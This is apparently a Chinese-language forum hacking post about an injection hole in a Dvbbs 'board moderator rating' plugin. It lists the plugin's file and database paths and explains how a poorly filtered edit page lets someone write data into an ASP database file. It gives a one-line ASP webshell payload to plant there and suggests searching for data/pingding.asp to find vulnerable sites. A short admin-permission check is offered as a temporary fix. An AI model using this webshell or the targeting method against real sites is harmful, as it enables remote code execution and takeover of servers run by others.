就是關於“斑主評定”欄目,當然是插件。插件比較亂,有很多,比如前台就是z_disadmin.aspz_disadmin_edit.aspz_disadminconn.asp後台在data/#pingding.mdb有的後台在data/pingding.asp有的則在data/disadmin_db.asp另外有的後台會這樣Data_plus/something的!當然可以暴庫,關鍵就是z_disadminconn.asp過濾不嚴,但是必須要找到它的所在,而且要二級。利用的方法:--------------------------------關於mdb作數據庫的,那當然沒什麼危險,這個漏洞也只能算是個雞肋。但是對於asp作數據庫的,卻有利用的方法。這都是因為edit中一個update的錯誤,大部分字段都是整型的,因為數據庫的規定而有一個字段是可以寫入木馬的。雖然長度有限制,但是夠寫一個微型木馬了,我用<%execute request("allyesno")%>對於暫時的防范,可以在edit中加入一個過濾參數:-----------codz begin----------------Head()dim admin_flag,isEdit,boname,msgtitle,msginfo,SubRsadmin_flag="22"if not Dvbbs.master or instr(session("flag"),admin_flag)=0 thenErrmsg=ErrMsg "<BR><li>本頁面為管理員專用,請<a href=admin_index.asp target=_top>登陸</a>後進入。<br><li>您沒有管理本頁面的權限。"dvbbs_error()end if -------------codz end---------------總而言之,只能說明開發插件的人頭腦有問題。雖然利用不大,5自學網,5自學網,擴散不廣。但是還是有得玩的!具體攻擊:應該是搜索data/pingding.asp。一般這個數據庫沒人改的。